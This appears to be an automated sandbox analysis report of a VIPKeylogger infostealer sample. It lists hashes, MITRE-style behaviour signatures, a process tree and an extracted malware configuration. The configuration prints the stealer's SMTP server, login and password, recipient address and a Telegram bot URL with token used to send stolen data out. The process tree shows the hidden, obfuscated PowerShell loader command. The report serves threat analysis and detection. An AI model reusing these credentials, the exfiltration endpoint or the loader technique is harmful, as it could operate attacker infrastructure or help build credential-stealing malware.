Analysis
-
max time kernel
137s -
max time network
141s -
platform
windows10-2004_x64 -
resource
win10v2004-20250211-en -
resource tags
arch:x64arch:x86image:win10v2004-20250211-enlocale:en-usos:windows10-2004-x64system -
submitted
14/02/2025, 03:55
Static task
static1
Behavioral task
behavioral1
Sample
b9b72b305909d1d2311e044b49181ef5411d5247d5674fc9cdccc3b7ed7c0421.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
b9b72b305909d1d2311e044b49181ef5411d5247d5674fc9cdccc3b7ed7c0421.exe
Resource
win10v2004-20250211-en
Behavioral task
behavioral3
Sample
Universitetsstuderende.ps1
Resource
win7-20241010-en
Behavioral task
behavioral4
Sample
Universitetsstuderende.ps1
Resource
win10v2004-20250207-en
General
-
Target
b9b72b305909d1d2311e044b49181ef5411d5247d5674fc9cdccc3b7ed7c0421.exe
-
Size
843KB
-
MD5
4e523395a445b905402cfcd5728a4a5c
-
SHA1
f3b7b24df9ab234a6b68ea97ca1566210ba490ef
-
SHA256
b9b72b305909d1d2311e044b49181ef5411d5247d5674fc9cdccc3b7ed7c0421
-
SHA512
23523171b883c3e1d2208dee1c6f9551311c4b4c95783152a40162254b4fa06060bb8a18b72041ea0ac72866360c72f63b541840b035bbe0fc3d7c79ef1a05bd
-
SSDEEP
12288:bkuXIHHuuov4KfGW5RASJ4PzcSsgUYvfrAYZvKek:7XIHHuuoVfGW5/e7cSsevfU4C
Malware Config
Extracted
vipkeylogger
Protocol: smtp- Host:
mail.novacitacor.pt - Port:
587 - Username:
[email protected] - Password:
#Novasystem123# - Email To:
[email protected]
https://api.telegram.org/bot7221326078:AAGaWyrW9EKGD1uh5gWS77zyAjwVr5QBesc/sendMessage?chat_id=7159751206
Signatures
-
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
-
Vipkeylogger family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 1660 powershell.exe -
Downloads MZ/PE file 1 IoCs
flow pid Process 60 1972 Process not Found -
Blocklisted process makes network request 6 IoCs
flow pid Process 21 2956 msiexec.exe 26 2956 msiexec.exe 28 2956 msiexec.exe 33 2956 msiexec.exe 37 2956 msiexec.exe 42 2956 msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 19 drive.google.com 21 drive.google.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 41 checkip.dyndns.org -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 2956 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 1660 powershell.exe 2956 msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 3280 2956 WerFault.exe 96 -
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b9b72b305909d1d2311e044b49181ef5411d5247d5674fc9cdccc3b7ed7c0421.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MicrosoftEdgeUpdate.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 748 MicrosoftEdgeUpdate.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 1660 powershell.exe 1660 powershell.exe 1660 powershell.exe 1660 powershell.exe 1660 powershell.exe 1660 powershell.exe 1660 powershell.exe 1660 powershell.exe 1660 powershell.exe 2956 msiexec.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 1660 powershell.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 1660 powershell.exe Token: SeIncreaseQuotaPrivilege 1660 powershell.exe Token: SeSecurityPrivilege 1660 powershell.exe Token: SeTakeOwnershipPrivilege 1660 powershell.exe Token: SeLoadDriverPrivilege 1660 powershell.exe Token: SeSystemProfilePrivilege 1660 powershell.exe Token: SeSystemtimePrivilege 1660 powershell.exe Token: SeProfSingleProcessPrivilege 1660 powershell.exe Token: SeIncBasePriorityPrivilege 1660 powershell.exe Token: SeCreatePagefilePrivilege 1660 powershell.exe Token: SeBackupPrivilege 1660 powershell.exe Token: SeRestorePrivilege 1660 powershell.exe Token: SeShutdownPrivilege 1660 powershell.exe Token: SeDebugPrivilege 1660 powershell.exe Token: SeSystemEnvironmentPrivilege 1660 powershell.exe Token: SeRemoteShutdownPrivilege 1660 powershell.exe Token: SeUndockPrivilege 1660 powershell.exe Token: SeManageVolumePrivilege 1660 powershell.exe Token: 33 1660 powershell.exe Token: 34 1660 powershell.exe Token: 35 1660 powershell.exe Token: 36 1660 powershell.exe Token: SeDebugPrivilege 2956 msiexec.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 440 wrote to memory of 1660 440 b9b72b305909d1d2311e044b49181ef5411d5247d5674fc9cdccc3b7ed7c0421.exe 92 PID 440 wrote to memory of 1660 440 b9b72b305909d1d2311e044b49181ef5411d5247d5674fc9cdccc3b7ed7c0421.exe 92 PID 440 wrote to memory of 1660 440 b9b72b305909d1d2311e044b49181ef5411d5247d5674fc9cdccc3b7ed7c0421.exe 92 PID 1660 wrote to memory of 2956 1660 powershell.exe 96 PID 1660 wrote to memory of 2956 1660 powershell.exe 96 PID 1660 wrote to memory of 2956 1660 powershell.exe 96 PID 1660 wrote to memory of 2956 1660 powershell.exe 96
Processes
-
C:\Users\Admin\AppData\Local\Temp\b9b72b305909d1d2311e044b49181ef5411d5247d5674fc9cdccc3b7ed7c0421.exe"C:\Users\Admin\AppData\Local\Temp\b9b72b305909d1d2311e044b49181ef5411d5247d5674fc9cdccc3b7ed7c0421.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:440 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "$Outyelp=Get-Content -Raw 'C:\Users\Admin\AppData\Roaming\figeater\Superslick\rheme\Universitetsstuderende.Tor';$Guldknappet=$Outyelp.SubString(28485,3);.$Guldknappet($Outyelp) "2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1660 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2956 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2956 -s 23964⤵
- Program crash
PID:3280
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 2956 -ip 29561⤵PID:3136
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7QTE1Qzk5QjgtMTgxMi00MDJELUIyRTUtNTFCRjY4MEZFQjJFfSIgdXNlcmlkPSJ7M0FDRjEwMzMtMjRCQi00QjVBLUIyNkYtQjA0OTk0OUQ3REQwfSIgaW5zdGFsbHNvdXJjZT0ibGltaXRlZCIgcmVxdWVzdGlkPSJ7MjU0RUNGN0UtRThGQy00OTcwLThGMEUtQjA2ODc0QkJDQTM0fSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjIiIHBoeXNtZW1vcnk9IjQiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0MS4xMjg4IiBzcD0iIiBhcmNoPSJ4NjQiIHByb2R1Y3RfdHlwZT0iNDgiIGlzX3dpcD0iMCIgaXNfaW5fbG9ja2Rvd25fbW9kZT0iMCIvPjxvZW0gcHJvZHVjdF9tYW51ZmFjdHVyZXI9IiIgcHJvZHVjdF9uYW1lPSIiLz48ZXhwIGV0YWc9IiZxdW90O0UreGJBejZZNnNVMTI4OWJTNnFsNFZSTGJramZCVUdUTUpzanJIcjQ0aUk9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0iezhBNjlEMzQ1LUQ1NjQtNDYzYy1BRkYxLUE2OUQ5RTUzMEY5Nn0iIHZlcnNpb249IjEyMy4wLjYzMTIuMTIzIiBuZXh0dmVyc2lvbj0iIiBsYW5nPSJlbiIgYnJhbmQ9IkdHTFMiIGNsaWVudD0iIiBpbnN0YWxsYWdlPSIyIiBpbnN0YWxsZGF0ZXRpbWU9IjE3MzkyODM0MTAiIG9vYmVfaW5zdGFsbF90aW1lPSIxMzM4Mzc1NTUzNjg2NzAwMDAiPjxldmVudCBldmVudHR5cGU9IjMxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIyMTc5ODYyIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI1NjQwNTQyMDg5Ii8-PC9hcHA-PC9yZXF1ZXN0Pg1⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:748
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
338KB
MD510c9f3125423560f6b14ebcafa20f6e1
SHA1758221fa1c6ae057b666212d260339a519a9e155
SHA256cc7409d0d651d33344d3ba01feb3ae01cf6f1dca74942169aa539daad52643b8
SHA5121a250725448ad665d12a1ba16f18a00aa7eb199330318594eb421f515a21194c802cd003533db49329f276268acedc544f380470e8b2460cc8c698da32f67fb6
-
Filesize
53KB
MD5e4c90f84532e87a7be49136c6dedd496
SHA13318b1654e28bb021204b89ed0074125ae449a8d
SHA2566313d40ac7f5dd82e268ccb8ecc0239f85d0e42fb7a484c6f6f94e644a6e36d7
SHA5123ab67b0b7f0a6f2d721e18bc6a962512dd7f58be6ef77602fa8508b357871f26f71a22cca7775132758e7774aab2473dc991cde17b62fedfe2c3c928a0db169e
-
Filesize
17KB
MD56764377f0ce6daf4db92f141dd6763b8
SHA19c7e9cb265b064822918437343a2d39c5385e123
SHA2566f1c31e5a578184b7b873968984062e360398d8a2b06be1a3042a20376fe8f6d
SHA512db6d1272221ee3aa82457fe6e2ad78d3714d758af3d11d29026f37a232abd46caac2be9fc01dbc99c0299bd5852956703e3d52c3384850f68f0137b7b6e0925c
-
Filesize
940B
MD5a4f05037e4db2efb5cbd10ad96c2d9ce
SHA1031e845952b50e47837fba83bd1f8ff03f3c5150
SHA25669aafb345e36e49b87b20631ed51f7ce90f020862eaf4b21f10afea632f19ccc
SHA512d58b9172ce79309e825bf2f41d5d4f595cc249daf0681dbd51aba4ca90cf90fd129b33925be7a938208421418ca9e015956adc715a5a178f00ba4f707d802fb9